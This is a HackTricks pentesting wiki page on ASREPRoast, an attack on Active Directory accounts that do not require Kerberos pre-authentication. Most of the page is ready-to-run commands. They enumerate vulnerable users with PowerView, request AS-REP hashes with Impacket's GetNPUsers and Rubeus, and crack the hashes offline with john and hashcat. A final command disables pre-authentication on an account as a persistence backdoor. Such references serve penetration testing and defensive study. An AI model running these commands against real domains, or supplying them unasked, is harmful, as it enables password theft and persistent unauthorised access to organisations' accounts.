HackTricks
Search…
Pentesting
Powered By GitBook
ASREPRoast

ASREPRoast

The ASREPRoast attack looks for users without Kerberos pre-authentication required attribute (DONT_REQ_PREAUTH).
That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.
Furthermore, no domain account is needed to perform this attack, only connection to the DC. However, with a domain account, a LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise usernames have to be guessed.

Enumerating vulnerable users (need domain credentials)

1
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
Copied!

Request AS_REP message

Using Linux
1
#Try all the usernames in usernames.txt
2
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
3
#Use domain creds to extract targets and target them
4
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
Copied!
Using Windows
1
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
2
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
Copied!

Cracking

1
john --wordlist=passwords_kerb.txt hashes.asreproast
2
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
Copied!

Persistence

Force preauth not required for a user where you have GenericAll permissions (or permissions to write properties):
1
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
Copied!
Last modified 1yr ago